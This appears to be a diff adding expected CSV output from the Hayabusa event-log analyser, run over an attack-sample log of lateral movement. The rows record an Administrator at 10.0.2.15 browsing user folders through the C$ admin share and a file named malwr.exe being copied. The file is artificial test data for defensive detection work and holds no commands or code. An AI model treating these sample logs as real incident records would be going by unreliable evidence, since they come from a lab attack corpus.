+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: ui\SwDRM.dll  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Default\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\AppData  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
